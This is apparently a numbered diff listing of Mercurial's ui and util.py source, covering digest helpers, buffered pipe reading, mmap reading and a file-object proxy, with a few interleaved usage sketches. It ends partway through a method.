2403 value = getattr(self, attr)
2398 if value is not None:
2404 if value is not None:
2399 d[subopt] = value
2405 d[subopt] = value
2400 return d
2406 return d
2401
2407
2402
2408
2403 # we instantiate one globally shared progress bar to avoid
2409 # we instantiate one globally shared progress bar to avoid
2404 # competing progress bars when multiple UI objects get created
2410 # competing progress bars when multiple UI objects get created
2405 _progresssingleton = None
2411 _progresssingleton = None
2406
2412
2407
2413
2408 def getprogbar(ui):
2414 def getprogbar(ui):
2409 global _progresssingleton
2415 global _progresssingleton
2410 if _progresssingleton is None:
2416 if _progresssingleton is None:
2411 # passing 'ui' object to the singleton is fishy,
2417 # passing 'ui' object to the singleton is fishy,
2412 # this is how the extension used to work but feel free to rework it.
2418 # this is how the extension used to work but feel free to rework it.
2413 _progresssingleton = progress.progbar(ui)
2419 _progresssingleton = progress.progbar(ui)
2414 return _progresssingleton
2420 return _progresssingleton
2415
2421
2416
2422
2417 def haveprogbar():
2423 def haveprogbar():
2418 return _progresssingleton is not None
2424 return _progresssingleton is not None
2419
2425
2420
2426
2421 def _selectmsgdests(ui):
2427 def _selectmsgdests(ui):
2422 name = ui.config(b'ui', b'message-output')
2428 name = ui.config(b'ui', b'message-output')
2423 if name == b'channel':
2429 if name == b'channel':
2424 if ui.fmsg:
2430 if ui.fmsg:
2425 return ui.fmsg, ui.fmsg
2431 return ui.fmsg, ui.fmsg
2426 else:
2432 else:
2427 # fall back to ferr if channel isn't ready so that status/error
2433 # fall back to ferr if channel isn't ready so that status/error
2428 # messages can be printed
2434 # messages can be printed
2429 return ui.ferr, ui.ferr
2435 return ui.ferr, ui.ferr
2430 if name == b'stdio':
2436 if name == b'stdio':
2431 return ui.fout, ui.ferr
2437 return ui.fout, ui.ferr
2432 if name == b'stderr':
2438 if name == b'stderr':
2433 return ui.ferr, ui.ferr
2439 return ui.ferr, ui.ferr
2434 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2440 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2435
2441
2436
2442
2437 def _writemsgwith(write, dest, *args, **opts):
2443 def _writemsgwith(write, dest, *args, **opts):
2438 """Write ui message with the given ui._write*() function
2444 """Write ui message with the given ui._write*() function
2439
2445
2440 The specified message type is translated to 'ui.<type>' label if the dest
2446 The specified message type is translated to 'ui.<type>' label if the dest
2441 isn't a structured channel, so that the message will be colorized.
2447 isn't a structured channel, so that the message will be colorized.
2442 """
2448 """
2443 # TODO: maybe change 'type' to a mandatory option
2449 # TODO: maybe change 'type' to a mandatory option
2444 if 'type' in opts and not getattr(dest, 'structured', False):
2450 if 'type' in opts and not getattr(dest, 'structured', False):
2445 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2451 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2446 write(dest, *args, **opts)
2452 write(dest, *args, **opts)
@@ -1,3715 +1,3730 @@
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import locale
25 import locale
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37
37
38 from .thirdparty import attr
38 from .thirdparty import attr
39 from .pycompat import (
39 from .pycompat import (
40 delattr,
40 delattr,
41 getattr,
41 getattr,
42 open,
42 open,
43 setattr,
43 setattr,
44 )
44 )
45 from .node import hex
45 from .node import hex
46 from hgdemandimport import tracing
46 from hgdemandimport import tracing
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 policy,
51 policy,
52 pycompat,
52 pycompat,
53 urllibcompat,
53 urllibcompat,
54 )
54 )
55 from .utils import (
55 from .utils import (
56 compression,
56 compression,
57 hashutil,
57 hashutil,
58 procutil,
58 procutil,
59 stringutil,
59 stringutil,
60 )
60 )
61
61
62 if pycompat.TYPE_CHECKING:
62 if pycompat.TYPE_CHECKING:
63 from typing import (
63 from typing import (
64 Iterator,
64 Iterator,
65 List,
65 List,
66 Optional,
66 Optional,
67 Tuple,
67 Tuple,
68 Union,
68 Union,
69 )
69 )
70
70
71
71
72 base85 = policy.importmod('base85')
72 base85 = policy.importmod('base85')
73 osutil = policy.importmod('osutil')
73 osutil = policy.importmod('osutil')
74
74
75 b85decode = base85.b85decode
75 b85decode = base85.b85decode
76 b85encode = base85.b85encode
76 b85encode = base85.b85encode
77
77
78 cookielib = pycompat.cookielib
78 cookielib = pycompat.cookielib
79 httplib = pycompat.httplib
79 httplib = pycompat.httplib
80 pickle = pycompat.pickle
80 pickle = pycompat.pickle
81 safehasattr = pycompat.safehasattr
81 safehasattr = pycompat.safehasattr
82 socketserver = pycompat.socketserver
82 socketserver = pycompat.socketserver
83 bytesio = pycompat.bytesio
83 bytesio = pycompat.bytesio
84 # TODO deprecate stringio name, as it is a lie on Python 3.
84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 stringio = bytesio
85 stringio = bytesio
86 xmlrpclib = pycompat.xmlrpclib
86 xmlrpclib = pycompat.xmlrpclib
87
87
88 httpserver = urllibcompat.httpserver
88 httpserver = urllibcompat.httpserver
89 urlerr = urllibcompat.urlerr
89 urlerr = urllibcompat.urlerr
90 urlreq = urllibcompat.urlreq
90 urlreq = urllibcompat.urlreq
91
91
92 # workaround for win32mbcs
92 # workaround for win32mbcs
93 _filenamebytestr = pycompat.bytestr
93 _filenamebytestr = pycompat.bytestr
94
94
95 if pycompat.iswindows:
95 if pycompat.iswindows:
96 from . import windows as platform
96 from . import windows as platform
97 else:
97 else:
98 from . import posix as platform
98 from . import posix as platform
99
99
100 _ = i18n._
100 _ = i18n._
101
101
102 bindunixsocket = platform.bindunixsocket
102 bindunixsocket = platform.bindunixsocket
103 cachestat = platform.cachestat
103 cachestat = platform.cachestat
104 checkexec = platform.checkexec
104 checkexec = platform.checkexec
105 checklink = platform.checklink
105 checklink = platform.checklink
106 copymode = platform.copymode
106 copymode = platform.copymode
107 expandglobs = platform.expandglobs
107 expandglobs = platform.expandglobs
108 getfsmountpoint = platform.getfsmountpoint
108 getfsmountpoint = platform.getfsmountpoint
109 getfstype = platform.getfstype
109 getfstype = platform.getfstype
110 groupmembers = platform.groupmembers
110 groupmembers = platform.groupmembers
111 groupname = platform.groupname
111 groupname = platform.groupname
112 isexec = platform.isexec
112 isexec = platform.isexec
113 isowner = platform.isowner
113 isowner = platform.isowner
114 listdir = osutil.listdir
114 listdir = osutil.listdir
115 localpath = platform.localpath
115 localpath = platform.localpath
116 lookupreg = platform.lookupreg
116 lookupreg = platform.lookupreg
117 makedir = platform.makedir
117 makedir = platform.makedir
118 nlinks = platform.nlinks
118 nlinks = platform.nlinks
119 normpath = platform.normpath
119 normpath = platform.normpath
120 normcase = platform.normcase
120 normcase = platform.normcase
121 normcasespec = platform.normcasespec
121 normcasespec = platform.normcasespec
122 normcasefallback = platform.normcasefallback
122 normcasefallback = platform.normcasefallback
123 openhardlinks = platform.openhardlinks
123 openhardlinks = platform.openhardlinks
124 oslink = platform.oslink
124 oslink = platform.oslink
125 parsepatchoutput = platform.parsepatchoutput
125 parsepatchoutput = platform.parsepatchoutput
126 pconvert = platform.pconvert
126 pconvert = platform.pconvert
127 poll = platform.poll
127 poll = platform.poll
128 posixfile = platform.posixfile
128 posixfile = platform.posixfile
129 readlink = platform.readlink
129 readlink = platform.readlink
130 rename = platform.rename
130 rename = platform.rename
131 removedirs = platform.removedirs
131 removedirs = platform.removedirs
132 samedevice = platform.samedevice
132 samedevice = platform.samedevice
133 samefile = platform.samefile
133 samefile = platform.samefile
134 samestat = platform.samestat
134 samestat = platform.samestat
135 setflags = platform.setflags
135 setflags = platform.setflags
136 split = platform.split
136 split = platform.split
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 statisexec = platform.statisexec
138 statisexec = platform.statisexec
139 statislink = platform.statislink
139 statislink = platform.statislink
140 umask = platform.umask
140 umask = platform.umask
141 unlink = platform.unlink
141 unlink = platform.unlink
142 username = platform.username
142 username = platform.username
143
143
144
144
145 def setumask(val):
145 def setumask(val):
146 # type: (int) -> None
146 # type: (int) -> None
147 ''' updates the umask. used by chg server '''
147 ''' updates the umask. used by chg server '''
148 if pycompat.iswindows:
148 if pycompat.iswindows:
149 return
149 return
150 os.umask(val)
150 os.umask(val)
151 global umask
151 global umask
152 platform.umask = umask = val & 0o777
152 platform.umask = umask = val & 0o777
153
153
154
154
155 # small compat layer
155 # small compat layer
156 compengines = compression.compengines
156 compengines = compression.compengines
157 SERVERROLE = compression.SERVERROLE
157 SERVERROLE = compression.SERVERROLE
158 CLIENTROLE = compression.CLIENTROLE
158 CLIENTROLE = compression.CLIENTROLE
159
159
160 try:
160 try:
161 recvfds = osutil.recvfds
161 recvfds = osutil.recvfds
162 except AttributeError:
162 except AttributeError:
163 pass
163 pass
164
164
165 # Python compatibility
165 # Python compatibility
166
166
167 _notset = object()
167 _notset = object()
168
168
169
169
170 def bitsfrom(container):
170 def bitsfrom(container):
171 bits = 0
171 bits = 0
172 for bit in container:
172 for bit in container:
173 bits |= bit
173 bits |= bit
174 return bits
174 return bits
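
# A small illustration of bitsfrom(): OR every element together, e.g.
#
#   bitsfrom([0b001, 0b010, 0b100]) == 0b111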
175
175
176
176
177 # Python 2.6 still has deprecation warnings enabled by default. We do not want
177 # Python 2.6 still has deprecation warnings enabled by default. We do not want
178 # to display anything to the standard user, so detect if we are running tests
178 # to display anything to the standard user, so detect if we are running tests
179 # and only use Python deprecation warnings in that case.
179 # and only use Python deprecation warnings in that case.
180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 if _dowarn:
181 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
182 # explicitly unfilter our warning for python 2.7
183 #
183 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 if _dowarn and pycompat.ispy3:
191 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
192 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(
193 warnings.filterwarnings(
194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 )
195 )
196 warnings.filterwarnings(
196 warnings.filterwarnings(
197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 )
198 )
199 # TODO: reinvent imp.is_frozen()
199 # TODO: reinvent imp.is_frozen()
200 warnings.filterwarnings(
200 warnings.filterwarnings(
201 'ignore',
201 'ignore',
202 'the imp module is deprecated',
202 'the imp module is deprecated',
203 DeprecationWarning,
203 DeprecationWarning,
204 'mercurial',
204 'mercurial',
205 )
205 )
206
206
207
207
208 def nouideprecwarn(msg, version, stacklevel=1):
208 def nouideprecwarn(msg, version, stacklevel=1):
209 """Issue an python native deprecation warning
209 """Issue an python native deprecation warning
210
210
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 """
212 """
213 if _dowarn:
213 if _dowarn:
214 msg += (
214 msg += (
215 b"\n(compatibility will be dropped after Mercurial-%s,"
215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 b" update your code.)"
216 b" update your code.)"
217 ) % version
217 ) % version
218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 # on python 3 with chg, we will need to explicitly flush the output
219 # on python 3 with chg, we will need to explicitly flush the output
220 sys.stderr.flush()
220 sys.stderr.flush()
221
221
222
222
223 DIGESTS = {
223 DIGESTS = {
224 b'md5': hashlib.md5,
224 b'md5': hashlib.md5,
225 b'sha1': hashutil.sha1,
225 b'sha1': hashutil.sha1,
226 b'sha512': hashlib.sha512,
226 b'sha512': hashlib.sha512,
227 }
227 }
228 # List of digest types from strongest to weakest
228 # List of digest types from strongest to weakest
229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230
230
231 for k in DIGESTS_BY_STRENGTH:
231 for k in DIGESTS_BY_STRENGTH:
232 assert k in DIGESTS
232 assert k in DIGESTS
233
233
234
234
235 class digester(object):
235 class digester(object):
236 """helper to compute digests.
236 """helper to compute digests.
237
237
238 This helper can be used to compute one or more digests given their name.
238 This helper can be used to compute one or more digests given their name.
239
239
240 >>> d = digester([b'md5', b'sha1'])
240 >>> d = digester([b'md5', b'sha1'])
241 >>> d.update(b'foo')
241 >>> d.update(b'foo')
242 >>> [k for k in sorted(d)]
242 >>> [k for k in sorted(d)]
243 ['md5', 'sha1']
243 ['md5', 'sha1']
244 >>> d[b'md5']
244 >>> d[b'md5']
245 'acbd18db4cc2f85cedef654fccc4a4d8'
245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 >>> d[b'sha1']
246 >>> d[b'sha1']
247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 >>> digester.preferred([b'md5', b'sha1'])
248 >>> digester.preferred([b'md5', b'sha1'])
249 'sha1'
249 'sha1'
250 """
250 """
251
251
252 def __init__(self, digests, s=b''):
252 def __init__(self, digests, s=b''):
253 self._hashes = {}
253 self._hashes = {}
254 for k in digests:
254 for k in digests:
255 if k not in DIGESTS:
255 if k not in DIGESTS:
256 raise error.Abort(_(b'unknown digest type: %s') % k)
256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 self._hashes[k] = DIGESTS[k]()
257 self._hashes[k] = DIGESTS[k]()
258 if s:
258 if s:
259 self.update(s)
259 self.update(s)
260
260
261 def update(self, data):
261 def update(self, data):
262 for h in self._hashes.values():
262 for h in self._hashes.values():
263 h.update(data)
263 h.update(data)
264
264
265 def __getitem__(self, key):
265 def __getitem__(self, key):
266 if key not in DIGESTS:
266 if key not in DIGESTS:
267 raise error.Abort(_(b'unknown digest type: %s') % key)
267 raise error.Abort(_(b'unknown digest type: %s') % key)
268 return hex(self._hashes[key].digest())
268 return hex(self._hashes[key].digest())
269
269
270 def __iter__(self):
270 def __iter__(self):
271 return iter(self._hashes)
271 return iter(self._hashes)
272
272
273 @staticmethod
273 @staticmethod
274 def preferred(supported):
274 def preferred(supported):
275 """returns the strongest digest type in both supported and DIGESTS."""
275 """returns the strongest digest type in both supported and DIGESTS."""
276
276
277 for k in DIGESTS_BY_STRENGTH:
277 for k in DIGESTS_BY_STRENGTH:
278 if k in supported:
278 if k in supported:
279 return k
279 return k
280 return None
280 return None
281
281
282
282
283 class digestchecker(object):
283 class digestchecker(object):
284 """file handle wrapper that additionally checks content against a given
284 """file handle wrapper that additionally checks content against a given
285 size and digests.
285 size and digests.
286
286
287 d = digestchecker(fh, size, {'md5': '...'})
287 d = digestchecker(fh, size, {'md5': '...'})
288
288
289 When multiple digests are given, all of them are validated.
289 When multiple digests are given, all of them are validated.
290 """
290 """
291
291
292 def __init__(self, fh, size, digests):
292 def __init__(self, fh, size, digests):
293 self._fh = fh
293 self._fh = fh
294 self._size = size
294 self._size = size
295 self._got = 0
295 self._got = 0
296 self._digests = dict(digests)
296 self._digests = dict(digests)
297 self._digester = digester(self._digests.keys())
297 self._digester = digester(self._digests.keys())
298
298
299 def read(self, length=-1):
299 def read(self, length=-1):
300 content = self._fh.read(length)
300 content = self._fh.read(length)
301 self._digester.update(content)
301 self._digester.update(content)
302 self._got += len(content)
302 self._got += len(content)
303 return content
303 return content
304
304
305 def validate(self):
305 def validate(self):
306 if self._size != self._got:
306 if self._size != self._got:
307 raise error.Abort(
307 raise error.Abort(
308 _(b'size mismatch: expected %d, got %d')
308 _(b'size mismatch: expected %d, got %d')
309 % (self._size, self._got)
309 % (self._size, self._got)
310 )
310 )
311 for k, v in self._digests.items():
311 for k, v in self._digests.items():
312 if v != self._digester[k]:
312 if v != self._digester[k]:
313 # i18n: first parameter is a digest name
313 # i18n: first parameter is a digest name
314 raise error.Abort(
314 raise error.Abort(
315 _(b'%s mismatch: expected %s, got %s')
315 _(b'%s mismatch: expected %s, got %s')
316 % (k, v, self._digester[k])
316 % (k, v, self._digester[k])
317 )
317 )
318
318
319
319
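# Hedged sketch (not part of the original module) of how digestchecker is meant
# to be used: wrap a file handle, read it to the end, then call validate() to
# confirm both the size and every announced digest. The payload and the helper
# name below are invented for illustration.
def _digestchecker_example():
    import io

    payload = b'some transferred payload'
    expected = {b'sha1': hex(hashlib.sha1(payload).digest())}
    wrapped = digestchecker(io.BytesIO(payload), len(payload), expected)
    while wrapped.read(4096):
        pass
    # validate() raises error.Abort on a size or digest mismatch.
    wrapped.validate()
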
320 try:
320 try:
321 buffer = buffer # pytype: disable=name-error
321 buffer = buffer # pytype: disable=name-error
322 except NameError:
322 except NameError:
323
323
324 def buffer(sliceable, offset=0, length=None):
324 def buffer(sliceable, offset=0, length=None):
325 if length is not None:
325 if length is not None:
326 return memoryview(sliceable)[offset : offset + length]
326 return memoryview(sliceable)[offset : offset + length]
327 return memoryview(sliceable)[offset:]
327 return memoryview(sliceable)[offset:]
328
328
329
329
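# Minimal sketch of the buffer() shim above: on Python 3 it returns a
# memoryview slice, so no bytes are copied. The example values are arbitrary.
def _buffer_example():
    data = b'abcdefgh'
    window = buffer(data, 2, 3)  # a zero-copy view over b'cde'
    return bytes(window)
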
330 _chunksize = 4096
330 _chunksize = 4096
331
331
332
332
333 class bufferedinputpipe(object):
333 class bufferedinputpipe(object):
334 """a manually buffered input pipe
334 """a manually buffered input pipe
335
335
336 Python will not let us use buffered IO and lazy reading with 'polling' at
336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 the same time. We cannot probe the buffer state and select will not detect
337 the same time. We cannot probe the buffer state and select will not detect
338 that data are ready to read if they are already buffered.
338 that data are ready to read if they are already buffered.
339
339
340 This class lets us work around that by implementing its own buffering
340 This class lets us work around that by implementing its own buffering
341 (allowing efficient readline) while offering a way to know if the buffer is
341 (allowing efficient readline) while offering a way to know if the buffer is
342 empty from the output (allowing collaboration of the buffer with polling).
342 empty from the output (allowing collaboration of the buffer with polling).
343
343
344 This class lives in the 'util' module because it makes use of the 'os'
344 This class lives in the 'util' module because it makes use of the 'os'
345 module from the Python stdlib.
345 module from the Python stdlib.
346 """
346 """
347
347
348 def __new__(cls, fh):
348 def __new__(cls, fh):
349 # If we receive a fileobjectproxy, we need to use a variation of this
349 # If we receive a fileobjectproxy, we need to use a variation of this
350 # class that notifies observers about activity.
350 # class that notifies observers about activity.
351 if isinstance(fh, fileobjectproxy):
351 if isinstance(fh, fileobjectproxy):
352 cls = observedbufferedinputpipe
352 cls = observedbufferedinputpipe
353
353
354 return super(bufferedinputpipe, cls).__new__(cls)
354 return super(bufferedinputpipe, cls).__new__(cls)
355
355
356 def __init__(self, input):
356 def __init__(self, input):
357 self._input = input
357 self._input = input
358 self._buffer = []
358 self._buffer = []
359 self._eof = False
359 self._eof = False
360 self._lenbuf = 0
360 self._lenbuf = 0
361
361
362 @property
362 @property
363 def hasbuffer(self):
363 def hasbuffer(self):
364 """True is any data is currently buffered
364 """True is any data is currently buffered
365
365
366 This will be used externally as a pre-step for polling IO. If there is
366 This will be used externally as a pre-step for polling IO. If there is
367 already buffered data then no polling should be set in place."""
367 already buffered data then no polling should be set in place."""
368 return bool(self._buffer)
368 return bool(self._buffer)
369
369
370 @property
370 @property
371 def closed(self):
371 def closed(self):
372 return self._input.closed
372 return self._input.closed
373
373
374 def fileno(self):
374 def fileno(self):
375 return self._input.fileno()
375 return self._input.fileno()
376
376
377 def close(self):
377 def close(self):
378 return self._input.close()
378 return self._input.close()
379
379
380 def read(self, size):
380 def read(self, size):
381 while (not self._eof) and (self._lenbuf < size):
381 while (not self._eof) and (self._lenbuf < size):
382 self._fillbuffer()
382 self._fillbuffer()
383 return self._frombuffer(size)
383 return self._frombuffer(size)
384
384
385 def unbufferedread(self, size):
385 def unbufferedread(self, size):
386 if not self._eof and self._lenbuf == 0:
386 if not self._eof and self._lenbuf == 0:
387 self._fillbuffer(max(size, _chunksize))
387 self._fillbuffer(max(size, _chunksize))
388 return self._frombuffer(min(self._lenbuf, size))
388 return self._frombuffer(min(self._lenbuf, size))
389
389
390 def readline(self, *args, **kwargs):
390 def readline(self, *args, **kwargs):
391 if len(self._buffer) > 1:
391 if len(self._buffer) > 1:
392 # this should not happen because both read and readline end with a
392 # this should not happen because both read and readline end with a
393 # _frombuffer call that collapses it.
393 # _frombuffer call that collapses it.
394 self._buffer = [b''.join(self._buffer)]
394 self._buffer = [b''.join(self._buffer)]
395 self._lenbuf = len(self._buffer[0])
395 self._lenbuf = len(self._buffer[0])
396 lfi = -1
396 lfi = -1
397 if self._buffer:
397 if self._buffer:
398 lfi = self._buffer[-1].find(b'\n')
398 lfi = self._buffer[-1].find(b'\n')
399 while (not self._eof) and lfi < 0:
399 while (not self._eof) and lfi < 0:
400 self._fillbuffer()
400 self._fillbuffer()
401 if self._buffer:
401 if self._buffer:
402 lfi = self._buffer[-1].find(b'\n')
402 lfi = self._buffer[-1].find(b'\n')
403 size = lfi + 1
403 size = lfi + 1
404 if lfi < 0: # end of file
404 if lfi < 0: # end of file
405 size = self._lenbuf
405 size = self._lenbuf
406 elif len(self._buffer) > 1:
406 elif len(self._buffer) > 1:
407 # we need to take previous chunks into account
407 # we need to take previous chunks into account
408 size += self._lenbuf - len(self._buffer[-1])
408 size += self._lenbuf - len(self._buffer[-1])
409 return self._frombuffer(size)
409 return self._frombuffer(size)
410
410
411 def _frombuffer(self, size):
411 def _frombuffer(self, size):
412 """return at most 'size' data from the buffer
412 """return at most 'size' data from the buffer
413
413
414 The data are removed from the buffer."""
414 The data are removed from the buffer."""
415 if size == 0 or not self._buffer:
415 if size == 0 or not self._buffer:
416 return b''
416 return b''
417 buf = self._buffer[0]
417 buf = self._buffer[0]
418 if len(self._buffer) > 1:
418 if len(self._buffer) > 1:
419 buf = b''.join(self._buffer)
419 buf = b''.join(self._buffer)
420
420
421 data = buf[:size]
421 data = buf[:size]
422 buf = buf[len(data) :]
422 buf = buf[len(data) :]
423 if buf:
423 if buf:
424 self._buffer = [buf]
424 self._buffer = [buf]
425 self._lenbuf = len(buf)
425 self._lenbuf = len(buf)
426 else:
426 else:
427 self._buffer = []
427 self._buffer = []
428 self._lenbuf = 0
428 self._lenbuf = 0
429 return data
429 return data
430
430
431 def _fillbuffer(self, size=_chunksize):
431 def _fillbuffer(self, size=_chunksize):
432 """read data to the buffer"""
432 """read data to the buffer"""
433 data = os.read(self._input.fileno(), size)
433 data = os.read(self._input.fileno(), size)
434 if not data:
434 if not data:
435 self._eof = True
435 self._eof = True
436 else:
436 else:
437 self._lenbuf += len(data)
437 self._lenbuf += len(data)
438 self._buffer.append(data)
438 self._buffer.append(data)
439
439
440 return data
440 return data
441
441
442
442
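# Hedged sketch (not part of the original module): feeding bufferedinputpipe
# from one end of an os.pipe(). Real callers check `hasbuffer` before blocking
# in select()/poll() on fileno(), because already-buffered data never wakes
# select() up. The pipe setup and helper name are purely illustrative.
def _bufferedinputpipe_example():
    rfd, wfd = os.pipe()
    os.write(wfd, b'first line\nsecond line\n')
    os.close(wfd)
    pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))
    first = pipe.readline()  # b'first line\n'
    rest = pipe.read(6)  # b'second'
    pipe.close()
    return first, rest
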
443 def mmapread(fp, size=None):
443 def mmapread(fp, size=None):
444 if size == 0:
444 if size == 0:
445 # size of 0 to mmap.mmap() means "all data"
445 # size of 0 to mmap.mmap() means "all data"
446 # rather than "zero bytes", so special case that.
446 # rather than "zero bytes", so special case that.
447 return b''
447 return b''
448 elif size is None:
448 elif size is None:
449 size = 0
449 size = 0
450 try:
450 try:
451 fd = getattr(fp, 'fileno', lambda: fp)()
451 fd = getattr(fp, 'fileno', lambda: fp)()
452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 except ValueError:
453 except ValueError:
454 # Empty files cannot be mmapped, but mmapread should still work. Check
454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 # if the file is empty, and if so, return an empty buffer.
455 # if the file is empty, and if so, return an empty buffer.
456 if os.fstat(fd).st_size == 0:
456 if os.fstat(fd).st_size == 0:
457 return b''
457 return b''
458 raise
458 raise
459
459
460
460
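# Hedged illustration (not part of the original module): mmapread() maps a file
# and the result can be sliced like bytes without eagerly loading everything.
# The temporary file only exists to make the example self-contained.
def _mmapread_example():
    import tempfile

    with tempfile.TemporaryFile() as tmp:
        tmp.write(b'0123456789')
        tmp.flush()
        data = mmapread(tmp)
        return bytes(data[2:5])  # b'234'
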
461 class fileobjectproxy(object):
461 class fileobjectproxy(object):
462 """A proxy around file objects that tells a watcher when events occur.
462 """A proxy around file objects that tells a watcher when events occur.
463
463
464 This type is intended to only be used for testing purposes. Think hard
464 This type is intended to only be used for testing purposes. Think hard
465 before using it in important code.
465 before using it in important code.
466 """
466 """
467
467
468 __slots__ = (
468 __slots__ = (
469 '_orig',
469 '_orig',
470 '_observer',
470 '_observer',
471 )
471 )
472
472
473 def __init__(self, fh, observer):
473 def __init__(self, fh, observer):
474 object.__setattr__(self, '_orig', fh)
474 object.__setattr__(self, '_orig', fh)
475 object.__setattr__(self, '_observer', observer)
475 object.__setattr__(self, '_observer', observer)
476
476
477 def __getattribute__(self, name):
477 def __getattribute__(self, name):
478 ours = {
478 ours = {
479 '_observer',
479 '_observer',
480 # IOBase
480 # IOBase
481 'close',
481 'close',
482 # closed is a property
482 # closed is a property
483 'fileno',
483 'fileno',
484 'flush',
484 'flush',
485 'isatty',
485 'isatty',
486 'readable',
486 'readable',
487 'readline',
487 'readline',
488 'readlines',
488 'readlines',
489 'seek',
489 'seek',
490 'seekable',
490 'seekable',
491 'tell',
491 'tell',
492 'truncate',
492 'truncate',
493 'writable',
493 'writable',
494 'writelines',
494 'writelines',
495 # RawIOBase
495 # RawIOBase
496 'read',
496 'read',
497 'readall',
497 'readall',
498 'readinto',
498 'readinto',
499 'write',
499 'write',
500 # BufferedIOBase
500 # BufferedIOBase
501 # raw is a property
501 # raw is a property
502 'detach',
502 'detach',
503 # read defined above
503 # read defined above
504 'read1',
504 'read1',
505 # readinto defined above
505 # readinto defined above
506 # write defined above
506 # write defined above
507 }
507 }
508
508
509 # We only observe some methods.
509 # We only observe some methods.
510 if name in ours:
510 if name in ours:
511 return object.__getattribute__(self, name)
511 return object.__getattribute__(self, name)
512
512
513 return getattr(object.__getattribute__(self, '_orig'), name)
513 return getattr(object.__getattribute__(self, '_orig'), name)
514
514
515 def __nonzero__(self):
515 def __nonzero__(self):
516 return bool(object.__getattribute__(self, '_orig'))
516 return bool(object.__getattribute__(self, '_orig'))
517
517
518 __bool__ = __nonzero__
518 __bool__ = __nonzero__
519
519
520 def __delattr__(self, name):
520 def __delattr__(self, name):
521 return delattr(object.__getattribute__(self, '_orig'), name)
521 return delattr(object.__getattribute__(self, '_orig'), name)
522
522
523 def __setattr__(self, name, value):
523 def __setattr__(self, name, value):
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525
525
526 def __iter__(self):
526 def __iter__(self):
527 return object.__getattribute__(self, '_orig').__iter__()
527 return object.__getattribute__(self, '_orig').__iter__()
528
528
529 def _observedcall(self, name, *args, **kwargs):
529 def _observedcall(self, name, *args, **kwargs):
530 # Call the original object.
